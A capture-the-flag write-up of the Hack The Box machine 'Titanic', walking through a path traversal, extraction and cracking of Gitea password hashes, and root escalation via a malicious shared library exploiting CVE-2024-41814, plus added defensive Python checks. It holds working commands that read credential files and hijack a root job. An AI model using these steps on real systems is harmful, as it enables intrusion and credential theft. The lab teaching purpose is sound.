Titanic - Hack The Box
This machine is part of HTB Season 7 and is categorized as an easy Linux box. It provides a great learning experience by combining web enumeration, credential extraction, and privilege escalation. The challenge revolves around exploring a developer’s environment, uncovering sensitive information, and leveraging vulnerabilities to gain root access. Let’s dive in!
Setup
Before starting the reconnaissance phase, we need to add the target machine’s IP address to the /etc/hosts file:

```
10.10.11.55 titanic.htb
```
Recon
We begin by scanning the target machine (10.10.11.55) for open ports using nmap:
```shell
nmap 10.10.11.55 -sV -sC -p- -oN nmapres
```

The scan reveals two open ports:

- 22/tcp (SSH)
- 80/tcp (HTTP)
Enumerating directories with gobuster
We use gobuster to discover directories:
```shell
gobuster dir -u titanic.htb -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words.txt > gobusteres
```

This reveals three directories:

- /download (status 400)
- /book (status 405)
- /server-status (status 403)
Discovering subdomains with FFUF
```shell
ffuf -u http://titanic.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.titanic.htb" -fw 20
```
The scan reveals a subdomain: dev.titanic.htb. We add it to /etc/hosts and visit the webpage.
Exploring the web application
Upon accessing dev.titanic.htb, we find two developer repositories:

- docker-config
- flask-app
In docker-config/mysql, we discover a docker-compose.yml file containing credentials:
This gives us the database root password, as well as a username and that user’s password.
We also check the flask-app repository, where we find the app.py file:
There we find the download route, which takes a GET parameter named ticket.
Exploiting path traversal
Let’s see whether we can exploit a potential path traversal at http://titanic.htb/download?ticket=/etc/passwd
… and it works!
This successfully retrieves the /etc/passwd file, confirming the vulnerability.
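To make the root cause concrete, here is an added Python example (not the box’s app.py, which is not reproduced in this writeup) showing the shape of the bug next to a hardened resolver. The base directory /opt/app/tickets and the function names are assumptions for illustration; the point is that the fixed version rejects absolute paths and anything that normalises to a location outside the base directory.

```python
import os
from typing import Optional

# Assumed base directory for ticket files; the box's real app.py is not
# reproduced here and its actual directory is not known from the writeup.
TICKET_DIR = "/opt/app/tickets"


def vulnerable_ticket_path(ticket: str, base: str = TICKET_DIR) -> str:
    """The shape of bug the writeup exploits: the GET parameter is joined to
    the base directory with no validation. os.path.join discards the base
    entirely when the user supplies an absolute path, and '..' segments walk
    out of it."""
    return os.path.join(base, ticket)


def safe_ticket_path(ticket: str, base: str = TICKET_DIR) -> Optional[str]:
    """Hardened resolver: returns the absolute path of the requested file only
    if it still lies inside `base` after normalisation, otherwise None."""
    if not ticket or "\x00" in ticket or os.path.isabs(ticket):
        return None
    base_real = os.path.realpath(base)
    # Resolve '..' segments and symlinks before comparing, so a link planted
    # inside the directory cannot point outside it either.
    candidate = os.path.realpath(os.path.join(base_real, ticket))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


if __name__ == "__main__":
    for t in ("ticket-123.pdf", "../../etc/passwd", "/etc/passwd"):
        print(f"{t!r:22} vulnerable -> {vulnerable_ticket_path(t)}")
        print(f"{t!r:22} safe       -> {safe_ticket_path(t)}")
```

The comparison uses os.path.commonpath on the resolved paths rather than a string prefix check, so a sibling directory such as /opt/app/tickets-old is not mistaken for a location inside the base.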
Extracting gitea credentials
Now that we know the path traversal works, I switched to Burp Suite:
From there we can identify the developer user:
Based on the Gitea documentation, we locate the app.ini file:
Then I checked the data/gitea/gitea.db file. I downloaded it first and found password hashes in it:
Let’s check if we can crack any of these…
But first, we need to properly extract each password hash. To do this, we use the following command suggested by oxdf:

```shell
sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do
  digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64)
  salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64)
  name=$(echo $data | cut -d'|' -f 3)
  echo "${name}:sha256:50000:${salt}:${digest}"
done | tee gitea.hashes
```
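The pipeline above only re-encodes what Gitea stores. As an added Python example (my own code, not from the box or from Gitea), the following reproduces the same transformation, builds a throwaway SQLite file in the layout of the user table with constructed accounts, and adds the check Gitea itself performs at login, which lets you confirm that a row matches a given password. The 50000 iterations match the command above; the 50-byte derived-key length is Gitea’s default for its pbkdf2 algorithm and is assumed here, as are the user names and passwords.

```python
import base64
import hashlib
import hmac
import os
import sqlite3
import tempfile
from typing import List, Tuple

# Parameters of Gitea's default "pbkdf2" password algorithm as reflected in the
# extraction command above: PBKDF2-HMAC-SHA256 with 50000 iterations. The
# 50-byte derived-key length is Gitea's default and is assumed here.
ITERATIONS = 50000
KEY_LEN = 50


def gitea_pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                               ITERATIONS, dklen=KEY_LEN)


def make_user_row(name: str, password: str) -> Tuple[str, str, str]:
    """Constructed row in the layout of Gitea's `user` table: passwd and
    salt are both stored as hex strings (this is what xxd -r -p undoes)."""
    salt = os.urandom(16)
    return gitea_pbkdf2(password, salt).hex(), salt.hex(), name


def to_hashcat_line(passwd_hex: str, salt_hex: str, name: str) -> str:
    """Same transformation as the shell pipeline: hex -> raw bytes -> base64,
    emitted as name:sha256:iterations:salt:digest."""
    digest = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    salt = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    return f"{name}:sha256:{ITERATIONS}:{salt}:{digest}"


def verify_password(candidate: str, passwd_hex: str, salt_hex: str) -> bool:
    """The comparison Gitea performs at login; confirms whether a given
    password corresponds to a stored row."""
    expected = bytes.fromhex(passwd_hex)
    actual = gitea_pbkdf2(candidate, bytes.fromhex(salt_hex))
    return hmac.compare_digest(actual, expected)


def export_hashes(db_path: str) -> List[str]:
    """Run the writeup's query against a Gitea SQLite database and return one
    line per user in the format the pipeline writes to gitea.hashes."""
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute("select passwd,salt,name from user").fetchall()
    finally:
        conn.close()
    return [to_hashcat_line(p, s, n) for p, s, n in rows]


def build_demo_db() -> str:
    """Throwaway SQLite file with two constructed users (not the box's data)."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path)
    with conn:
        conn.execute("create table user (passwd text, salt text, name text)")
        conn.executemany("insert into user values (?, ?, ?)", [
            make_user_row("developer", "constructed-password-1"),
            make_user_row("alice", "constructed-password-2"),
        ])
    conn.close()
    return path


if __name__ == "__main__":
    for line in export_hashes(build_demo_db()):
        print(line)
```

A 16-byte salt becomes 24 base64 characters and the 50-byte digest becomes 68, so each emitted line has exactly four colons, which is what the consuming tool expects from this format.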
And we successfully crack two hashes :
We can now try to connect via SSH with that password:
From there, we have access to the user flag:
Privilege escalation
After enumerating the target machine a bit, I found a script, identify_images.sh, owned by the root user and executable by the developer user. We can assume that this script is run every few minutes by the root user.
We can see that the script uses the magick binary, so we first check its version:
Checking the ImageMagick version reveals it is vulnerable to CVE-2024-41814.
Exploiting CVE-2024-41814
From the identify_images.sh script, we can see that it first changes the directory to /opt/app/static/assets/images. It searches for all files with a .jpg extension in the directory and its subdirectories using the find command and processes each .jpg file with the magick identify command and appends the output to metadata.log.
So we first need to craft a malicious shared library in the current working directory:

```shell
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* constructor runs as soon as magick loads the library from its working directory */
__attribute__((constructor)) void init(){
system("cat /root/root.txt > /tmp/pwned");
exit(0);
}
EOF
```
Then we create a fake image file from an existing jpg file:

```shell
cp home.jpg root.jpg
```
After waiting for identify_images.sh to execute, the root flag appears in /tmp/pwned.
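The conditions that made this chain work are worth checking for on any host: a root-run job that changes into a directory other users can write to, and a binary that resolves shared libraries relative to that directory. Here is an added Python audit check (my own code, not part of the box or the writeup) that walks a job’s working directory and its ancestors for non-root-writable permissions and lists any shared objects found in the tree. The demo directory, file names and permissions are constructed to mirror the scenario above, not taken from the machine.

```python
import os
import stat
import tempfile
from typing import List


def audit_job_workdir(workdir: str) -> List[str]:
    """Report the conditions that made the cron job exploitable: the working
    directory, or an ancestor, writable by non-root users (so a user can plant
    files there), and shared objects lying in the directory tree that a binary
    resolving libraries relative to its working directory could pick up."""
    findings: List[str] = []
    path = os.path.realpath(workdir)

    # Walk up to / : a writable ancestor lets a user replace the directory itself.
    cur = path
    while True:
        st = os.stat(cur)
        world_writable = bool(st.st_mode & stat.S_IWOTH)
        sticky = bool(st.st_mode & stat.S_ISVTX)
        if world_writable and not sticky:
            findings.append(f"world-writable without sticky bit: {cur}")
        if st.st_uid != 0:
            findings.append(f"owned by non-root uid {st.st_uid}: {cur}")
        parent = os.path.dirname(cur)
        if parent == cur:
            break
        cur = parent

    # Any lib*.so / lib*.so.N in the tree is suspicious in an image directory.
    for root, _dirs, files in os.walk(path):
        for name in files:
            lower = name.lower()
            if lower.endswith(".so") or ".so." in lower:
                findings.append(f"shared object in job directory: {os.path.join(root, name)}")
    return findings


def build_demo_dir() -> str:
    """Constructed scenario mirroring the writeup (not the box's filesystem):
    an images directory any user can write to, holding the .jpg files the job
    processes plus a planted libxcb.so.1."""
    d = tempfile.mkdtemp(prefix="images-")
    os.chmod(d, 0o777)
    for name in ("home.jpg", "root.jpg", "libxcb.so.1"):
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(b"constructed placeholder\n")
    return d


def run_demo() -> List[str]:
    return audit_job_workdir(build_demo_dir())


if __name__ == "__main__":
    for finding in run_demo():
        print("FINDING:", finding)
```

Directories with the sticky bit set, such as /tmp, are deliberately not flagged as world-writable, since users cannot replace each other’s files there; the remaining findings point at the two fixes that close this class of issue: run the job from a root-owned directory, and upgrade ImageMagick to a version where the library search path no longer includes the working directory.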
Congratulations! This CTF was a great opportunity to practice essential pentesting techniques, from reconnaissance with nmap, gobuster, and ffuf to web exploitation through a path traversal vulnerability. It also involved credential extraction and cracking using SQLite, followed by privilege escalation through an ImageMagick vulnerability. Each step highlighted the importance of methodical enumeration and creative exploitation.
I hope you found this writeup insightful. Thanks for reading and happy hacking!